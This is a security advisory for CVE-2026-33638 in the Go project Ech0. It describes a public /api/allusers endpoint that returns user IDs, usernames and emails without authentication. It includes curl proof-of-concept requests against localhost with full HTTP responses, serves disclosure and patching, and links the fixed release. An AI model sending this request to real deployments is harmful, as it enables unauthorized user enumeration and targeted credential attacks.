GHSA-m983-7426-5hrj
Suggest an improvement- Source
- https://github.com/advisories/GHSA-m983-7426-5hrj
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-m983-7426-5hrj/GHSA-m983-7426-5hrj.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-m983-7426-5hrj
- Aliases
-
- CVE-2026-33638
- GO-2026-4838
- Published
- 2026-03-24T22:25:03Z
- Modified
- 2026-03-26T21:11:15.070530Z
- Severity
-
- 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVSS Calculator
- Summary
- Ech0 authenticated user-list exposed data via public `/api/allusers` endpoint
- Details
-
Summary
GET /api/allusersis mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata.Details
The route is registered under public routes:
internal/router/user.go:17appRouterGroup.PublicRouterGroup.GET("/allusers", h.UserHandler.GetAllUsers())
The handler itself is documented as requiring authentication:
internal/handler/user/user.go:177-185- API docs/annotations indicate auth requirement (
@Security ApiKeyAuth).
- API docs/annotations indicate auth requirement (
PoC
1) Negative control: endpoint that should require auth
Request:
curl -i "http://localhost:6277/api/user"Response:
HTTP/1.1 401 Unauthorized Access-Control-Allow-Headers: * Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0 Content-Language: zh-CN Content-Type: application/json; charset=utf-8 Expires: 0 Pragma: no-cache Surrogate-Control: no-store Date: Sun, 22 Mar 2026 07:21:22 GMT Content-Length: 135 {"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}2) Trigger: call public user-list endpoint without auth
Request:
curl -i "http://localhost:6277/api/allusers"Response:
HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type Content-Language: zh-CN Content-Type: application/json; charset=utf-8 Date: Sun, 22 Mar 2026 07:21:56 GMT Content-Length: 912 {"code":1,"msg":"获取用户列表成功","data":[{"id":"019d144a-18fa-7db3-a2dd-310604210abd","username":"h1_poc_1774161893_1","email":"h1_poc_1774161893_1@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-1904-7c0a-98ec-656079a82c64","username":"h1_poc_1774161893_2","email":"h1_poc_1774161893_2@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-190b-70f8-89cb-4f8ab46cec9b","username":"h1_poc_1774161893_3","email":"h1_poc_1774161893_3@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7dc-7cef-9395-4d0e392a5278","username":"alice","email":"alice@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7e3-79f3-bb09-0ea758333a54","username":"bob","email":"bob@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"}]}Impact
Vulnerability type: Access control bypass / unauthenticated data exposure.
Who is impacted: Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated.
Business/security impact: Enables account reconnaissance and targeted credential attacks.A fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-03-24T22:25:03Z", "cwe_ids": [ "CWE-862" ], "nvd_published_at": null, "severity": "MODERATE" }- References
Affected packages
Go / github.com/lin-snow/ech0
Package
- Name
- github.com/lin-snow/ech0
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/lin-snow/ech0